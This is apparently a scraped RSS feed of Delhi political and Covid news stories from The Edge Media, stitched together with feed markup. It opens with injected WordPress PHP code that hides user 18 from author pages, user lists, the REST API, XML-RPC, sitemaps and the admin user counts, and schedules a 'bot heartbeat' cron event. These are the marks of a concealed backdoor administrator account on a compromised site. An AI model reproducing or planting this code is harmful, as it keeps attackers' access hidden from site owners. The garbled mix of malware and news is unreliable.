add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Delhi government to honour 122 teachers with State Teachers Award appeared first on The Edge Media.
]]>While announcing the State Teachers’ Award, Deputy Chief Minister Manish Sisodia in a social media post said: “On the occasion of Teachers Day, Delhi government will honour teachers of Delhi with State Teachers Awards to recognise their invaluable contribution especially during the COVID crisis.”
“It’s because of our teachers that the Delhi education system is now being recognised globally,” the minister added.
A TGT Mathematics teacher will be conferred the state’s Teachers’ Award for using art to teach her subject. Manisha Pavi advocates cooperative learning strategies and play-way revision tools for teaching mathematics.
Another award-holder Sushama Kumari has been awarded for developing the overall personality of her students.
Renu Bala of Government Sarvodaya Vidyalaya has been conferred the State Teachers’ Award for using creativity, innovation and pedagogy in education, curriculum development, role-play for effective teaching and learning.
While two teachers have received the State Teachers’ Award in Special Category for being instrumental in mobilising help for the students whose parents could not afford smartphones to their wards and reaching out to the students who could not be contacted on phone for online classes during Covid pandemic. The Special Category award holders are Bharti Kalra, Vice Principal of Sarvodaya Co-ed Vidyalaya Rohini Sector 8, and Sarita Rani Bhardwaj, Lecturer Political Science, Sarvodaya Co-ed Senior Secondary School, Mangolpuri.
The post Delhi government to honour 122 teachers with State Teachers Award appeared first on The Edge Media.
]]>The post Covid-19: From Monday, The Delhi Government will Lift the 8 p.m. Market Limit appeared first on The Edge Media.
]]>Due to Covid-19, markets in Delhi were allowed to operate until 8 p.m., according to a translation of Kejriwal’s Hindi tweet. Due to a decrease in cases, this limitation will be lifted on Monday. Markets can now open at their regular times.
After a lockdown was established on April 19 because of a spike in cases during the second Covid-19 wave, several markets were blocked in the national capital. Later, with proper adherence to Covid-appropriate behavior and official rules, one weekly market in each municipal zone was authorized to open.
The post Covid-19: From Monday, The Delhi Government will Lift the 8 p.m. Market Limit appeared first on The Edge Media.
]]>The post Delhi government lifts deadline for shops appeared first on The Edge Media.
]]>The relaxation, which will come into force from Monday, will apply to all shops, including those in shopping complexes and malls. Also, restaurants in the city can now stay open beyond 10 pm.
Announcing the decision, Chief Minister Arvind Kejriwal said, “Till now, markets in Delhi had permission to stay open till 8 pm. As the number of Covid cases have dropped, this restriction is being lifted.”
The Chief Minister’s announcement came as Delhi reported 19 new Covid cases today and zero deaths with a positivity rate of 0.03 per cent. The number of active cases in the national capital now stands at 430.
During the second wave of Covid infections that struck in April-May this year, Delhi witnessed horrifying scenes of people scrambling for hospital beds and oxygen cylinders. The city had then recorded a single-day high of 28,395 cases and its positivity rate had crossed the 35 per cent mark.
To bring the situation under control, strict curbs had been put in place and all shops, except those dealing in essential items, were ordered to shut. This came as a double blow to shopowners already reeling under the impact of last year’s nationwide lockdown.
In June, when the city was recording about 200 cases daily, the Delhi government allowed shops and restaurants to open between 10 am and 8 pm.
The post Delhi government lifts deadline for shops appeared first on The Edge Media.
]]>The post Centre asks CBI probe in the purchase of 1,000 air-conditioned low floor buses by the Delhi government appeared first on The Edge Media.
]]>People familiar with the development said on Thursday the ministry of home affairs (MHA), after examining the report submitted by Lieutenant Governor Anil Baijal-appointed three-member panel, which it says recommended a “detailed enquiry”, has asked the Central Bureau of Investigation to register a preliminary enquiry (PE) in the matter.
A PE is the precursor to a First Information Report (FIR), during which agency carries out investigations to ascertain whether a cognizable offence is made out or not.
The Delhi government termed the move as “harassment” by the Centre.
“There is absolutely no truth to these allegations. A committee was already set up to investigate the matter thoroughly, which gave a clean chit. It is a politically motivated conspiracy against AAP. The BJP wants to prevent the people of Delhi from getting new buses,” the Delhi government said in a statement.
“In the past as well, the Centre has tried to harass the Delhi government using the CBI, but not even once has their attempt been successful because there has never been any truth to any of their allegations. The Delhi government does not believe in the politics of slander, it only believes in good governance and is committed to delivering upon its promise of good governance,” it added.
Incidentally, as reported by HT in the second week of July, the L-G-appointed panel gave a clean chit to the Delhi Transport Corporation (DTC) in the tendering and procurement of the buses; except finding some “procedural lapses” arising out of “a bona fide decision making”.
“The tendering process of purchase of buses warrants no interference and suffers from no major infirmity… The committee, prima facie, did not come across any material to impute criminal misconduct attributable to any public official,” the report said.
There were only procedural lapses apparently arising out of a bona fide decision-making process. However, a greater effort for understanding the market and a higher degree of due diligence in assessing reasonableness of bids was required compared to what seems to have been demonstrated,” it added.
The DTC, which comes under the Delhi government, in March last year, floated a tender for procurement of 1,000 CNG low-floor buses and issued another tender for allotting the annual maintenance contract (AMC) for these buses four months later.
The post Centre asks CBI probe in the purchase of 1,000 air-conditioned low floor buses by the Delhi government appeared first on The Edge Media.
]]>The post Supreme Court Asks For Vaccines To Center For Beggars Upon Receiving Plea appeared first on The Edge Media.
]]>Having to beg in public locations and roads is a social and economic concern, the panel of justices DY Chandrachud and MR Shah emphasized. To help it in this issue, the court has summoned Solicitor General Tushar Mehta for assistance.
The post Supreme Court Asks For Vaccines To Center For Beggars Upon Receiving Plea appeared first on The Edge Media.
]]>The post Arvind Kejriwal urges PM Modi once again appeared first on The Edge Media.
]]>CM reminded P.M Modi that his AAP government had supported the centre on various matters of “national interest” and asked for similar consideration in this case.
“Till date, I have supported you in all the work of national interest, you should also support us for the same. The scheme should be implemented in the whole country during the COVID times. We are ready to do whatever amendments the Central government wants to make to this scheme. I request you with folded hands on behalf of 70 lakh poor people of Delhi, Sir, please do not stop this scheme,” CM Kejriwal wrote in his letter to the Prime Minister.
In his letter to the PM, Kejriwal said the scheme should be implemented across the country in view of COVID-19 otherwise ration shops will act as “super-spreaders”.
Kejriwal had earlier alleged that the doorstep ration delivery scheme announced by his government was unnecessarily stalled by the Centre.
Addressing an online conference CM said “People are distressed that the central government is fighting everyone. If we fight like this how will we tackle Covid – 19.” He also said ” The Delhi government did not require the Centre’s approval for the implementation of the scheme , but it sought permission five times to avoid any dispute.”
The AAP chief pointed out that the scheme will finish the powerful ration mafia in Delhi whom he had fought while working in Delhi’s slums 17 years ago and faced attacks several times.
“If you stand with the ration mafia, who will stand with the poor people,” the chief minister said, adding that the scheme was intended to benefit 72 lakh people in the national capital.
This ration mafia has strong connections which are evident now as they got the doorstep delivery scheme rejected, he said and added that the Delhi government had made all preparations and was going to launch it in a few days.
He said one reason given by the Centre for rejecting the scheme was that a case has been filed by some ration shop owners in the high court. But the court did not stay the scheme and even the central government did not raise any objection there, the chief minister said.
“Even the name of the scheme was changed after the objection of the central government and yet they are saying no approval was sought. How else do you get approval?” he questioned. The chief minister claimed that it was being said by some central government officers that the Delhi government cannot take credit for the scheme by using the ration provided by the Centre.
“I am not doing this for credit. Please allow implementation of doorstep delivery of ration scheme and I will myself tell everyone that it was done by Prime Minister Narendra Modi,” Kejriwal said.
He claimed that this ration does not belong to the BJP or the Aam Aadmi Party (AAP) but to the people of the country. He stated “It is the responsibility of both of us that it reaches the people without theft.
The post Arvind Kejriwal urges PM Modi once again appeared first on The Edge Media.
]]>The post Arvind Kejriwal says, “If pizza , burger can be delivered home, why not ration” appeared first on The Edge Media.
]]>
Delhi CM Arvind Kejriwal accused ration mafia of influencing the centre’s decision. He disputed claim that his government did not take permission from the centre.
Arvind Kejriwal, CM of Delhi asked PM Narendra Modi why the doorstep ration delivery scheme by his government obstructed by the Centre and appealed to him to allow its implementation. He further added, the scheme would have benefitted 72 lakh ration beneficiaries.”
He asked , “If pizza, burgers, smartphones and clothes can be delivered at home , then why can’t ration be delivered at their doorstep?”
Addressing an online conference CM said “People are distressed that the central government is fighting everyone. If we fight like this how will we tackle Covid – 19.” He also said ” The Delhi government did not require the Centre’s approval for the implementation of the scheme , but it sought permission five times to avoid any dispute.”
The post Arvind Kejriwal says, “If pizza , burger can be delivered home, why not ration” appeared first on The Edge Media.
]]>The post Corona crisis escalated in Delhi: Will lockdown increase or end? appeared first on The Edge Media.
]]>The post Corona crisis escalated in Delhi: Will lockdown increase or end? appeared first on The Edge Media.
]]>The post Kejriwal seeks help from all states for Delhi appeared first on The Edge Media.
]]>CM Kejriwal of Delhi said in the letter that ‘Medical oxygen is not produced in Delhi and there is no medical oxygen factory here, so do whatever you can to support it.’
Delhi Chief Minister Arvind Kejriwal wrote a letter to his counterparts from other states requesting supply of oxygen.
In the letter, Kejriwal said, “The central government is helping us, but the outbreak of covid-19 is such that all the resources being provided are falling short.”
Kejriwal government released Rs 52.88 crore for construction workers, more than 1 lakh workers got benefits
There is an outcry in Delhi hospitals regarding oxygen supply. There is a lot of pressure on hospitals where small and big hospitals are running out of limited supplies for the next few hours. Disappointing scenes are also seen outside hospitals, where queues of ambulances, troubled relatives are pleading to recruit patients, patients are breathing and hospitals trying to deal with emergency situations standing at their door Have been.
Hospital in Delhi forced to use protected storage of oxygen
In the midst of a deepening crisis over the lack of oxygen in Delhi, many hospitals have no option but to use protected back-up storage. Some hospitals like Saroj Super Specialty are advising relatives of patients to take patients to another hospital. Forti’s Hospital (Shalimar Bagh) is currently running on a protected oxygen supply and has urged the Prime Minister, the Chief Minister of Delhi and other ministers to provide ‘immediate help’.
Saroj Super Specialty Hospital has not been supplied oxygen for the last 44 hours and is now advising relatives of the patients to take them to another hospital. PK Bhardwaj, Medical Director of Saroj Super Specialty Hospital, said, “We are running out of oxygen and using our back-ups. We have informed the patients about the situation and are advising them to be admitted to other hospitals. Things are really very unstable. “
Bhardwaj said that the hospital needs an average of three metric tons of oxygen per day and has been getting around one metric ton of oxygen for the last few days. The hospital currently has 70 patients on oxygen.
Officials said that 20 extremely sick patients died overnight in Jaipur Golden Hospital in Delhi amid an oxygen crisis. There are about 200 patients admitted to the hospital and they had only half an hour of oxygen left at 10.45 am.
The situation is also similar in Forti’s Hospital of Shalimar Bagh and work is being carried out here with protected oxygen supply and waiting for oxygen supply from morning. The hospital tweeted that oxygen was running out at Forties Hospital in Shalimar Bagh and patients’ lives were in danger.
The hospital said in the tweet, “We are using conserved oxygen and are waiting for its supply since morning.” We are currently prohibiting the recruitment of patients. Immediately there is a request for help. ” He has tagged this tweet to the Prime Minister’s Office, Delhi Chief Minister Arvind Kejriwal, Union Home Minister Amit Shah, Railway Minister Piyush Goyal and Defense Minister Rajnath Singh.
The hospital said that it is keeping patients and the stakeholders aware of the ‘critical situation’ and is trying to manage the admitted patients to the best of their ability. Other hospitals receiving new supplies claim that their oxygen storage will end in a few hours.
Batra Hospital located in Tughlakabad Institutional Area received an emergency supply of oxygen by the Delhi government within minutes of the oxygen exhaustion. He has said that his storage will last for one and a half hours.
The hospital’s executive director, Sudhanshu Venkat, said that the hospital had run out of oxygen at around 9 am. He told, “Just now, emergency supply of oxygen has been provided to us by the Delhi government. It will last for about one and a half hours. Our supplier is not answering the phone. “There are about 350 patients admitted to the hospital of which 265 are suffering from Corona virus and 30 are in ICU.
Officials said the Sir Gangaram Hospital in central Delhi requires at least 11,000 cubic meters of oxygen per day. When 1.5 tons of oxygen reached the hospital, it had 200 cubic meters of oxygen left. An official said, “This 1.5 tonne supply can be finished in two hours.” The situation is very serious. “
The post Kejriwal seeks help from all states for Delhi appeared first on The Edge Media.
]]>The post Wife of Delhi CM Arvind Kejriwal tested corona positive appeared first on The Edge Media.
]]>He has isolated himself, but he is looking at every thing personally. Apart from this, the whole team is engaged under the leadership of Deputy Chief Ministers Manish Sisodia and Satyendra Jain.
Significantly, the number of corona cases has increased rapidly in the country as well as in Delhi in recent times. More than 25 thousand corona cases were filed in Delhi on Sunday.
Talking about the country, according to the data released by the Union Health Ministry, on Tuesday, more than two and a half lakh new cases have been reported in India.
This is the fourth consecutive day when more than 2.5 lakh new cases have been registered in the country, according to the Ministry, the number of total infected has increased to 1,53,21,089 after 2,59,170 new cases have come in the country in the last 24 hours.
At the same time, the maximum number of deaths in this period has been 1761, after which the total number of dead has increased to 1,80,530. The most worrying matter is that the number of active patients in the country has crossed the 20 lakh mark.
According to the Union Health Ministry, covid currently has 20,31,977 active in the country. That is, their treatment is either going on in the hospital or it is in home isolation on the instructions of the doctors.
The post Wife of Delhi CM Arvind Kejriwal tested corona positive appeared first on The Edge Media.
]]>